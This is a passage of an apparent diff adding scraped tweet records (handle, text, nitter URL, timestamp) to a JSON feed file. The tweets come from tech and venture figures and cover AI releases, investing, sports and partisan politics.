deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://nitter.net/paulg/status/2048370801833828507#m", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Yeah", + "url": "https://nitter.net/elonmusk/status/2048271866914083172#m", + "published_at": "2026-04-26T05:24:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://nitter.net/Jason/status/2048245718171648271#m", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://nitter.net/Jason/status/2048151434928017429#m", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://nitter.net/Jason/status/2048116521436590260#m", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://nitter.net/Jason/status/2048116362766127514#m", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://nitter.net/twistartups/status/2048099001782985057#m", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter", + "title_zh": "@ylecun转推:当MTV新闻关停时,仿佛数十年文化瞬间消失。但已有47万余页内容被保存。历史并未消失,已被归档。阅读《消失的文化》了解其重要性:https://archive.org/details/vanishing-culture-2026" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://nitter.net/sama/status/2048062261584077149#m", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back.\n\nElon said it. Aravind from Perplexity agrees. And startups are already making it a reality.\n\ncc: @elonmusk, @AravSrinivas, @Jason, @perplexity_ai, @ThisWeeknAI", + "url": "https://nitter.net/twistartups/status/2048057234865693125#m", + "published_at": "2026-04-25T15:11:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://nitter.net/paulg/status/2048024967996993760#m", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://nitter.net/garrytan/status/2048017824895909901#m", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://nitter.net/paulg/status/2048017345000415744#m", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://nitter.net/vaggelisdrak/status/2047957234664030380#m", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://nitter.net/paulg/status/2047944827887591681#m", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://nitter.net/paulg/status/2047942555254288757#m", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://nitter.net/paulg/status/2047941243234107691#m", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these lunatics up to…", + "url": "https://nitter.net/Jason/status/2047858837319774540#m", + "published_at": "2026-04-25T02:02:48+00:00", + "source": "nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://nitter.net/Svwang1/status/2047858045057909226#m", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://nitter.net/sama/status/2047823357635354814#m", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess.\n\nLAMAT is fixing the chaos. It's a marketplace that lets organizations discover, book, and manage every event service on a single platform.", + "url": "https://nitter.net/LAUNCH/status/2047813100091449428#m", + "published_at": "2026-04-24T23:01:04+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://nitter.net/theallinpod/status/2047808256047821141#m", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://nitter.net/sama/status/2047787124846653895#m", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://nitter.net/unusual_whales/status/2047761493274571036#m", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://nitter.net/ziv_ravid/status/2047760455679246500#m", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://nitter.net/DavidSacks/status/2047717649849659586#m", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00", + "source": "nitter" + }, + { + "handle": "Svwang1", + "account": "@Svwang1", + "name": "王川", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://nitter.net/Svwang1/status/2047703469063377001#m", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://nitter.net/SquawkCNBC/status/2047703023690924289#m", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter", + "title_zh": "@ylecun转推:图灵奖得主、AI三巨头之一LeCun在达沃斯的发言撕开了硅谷的遮羞布。他指出行业已被LLM完全洗脑,所有人都在同一条赛道互相挖人,偏离主流就会被骂落后。这也是他离开Meta的真实原因,连Meta都已LLM-pilled,他拒绝随大流。最扎心的话:无论是LLM、VLM还是VLA,纯生成式架构永远无法创造出猫级别的智能体,因为它们本质只是下一个token的预测机,从未真正理解世界因果。它们无法预测行动后果,不会规划,缺乏常识。当然这不意味着LLM无用,短期LLM+微调+工具调用已能替代80%白领工作。但长期看这条路有天花板,因其仅能基于文字地图行动,无法真正驾驶现实中车辆" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://nitter.net/RapidResponse47/status/2047694657107165519#m", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": 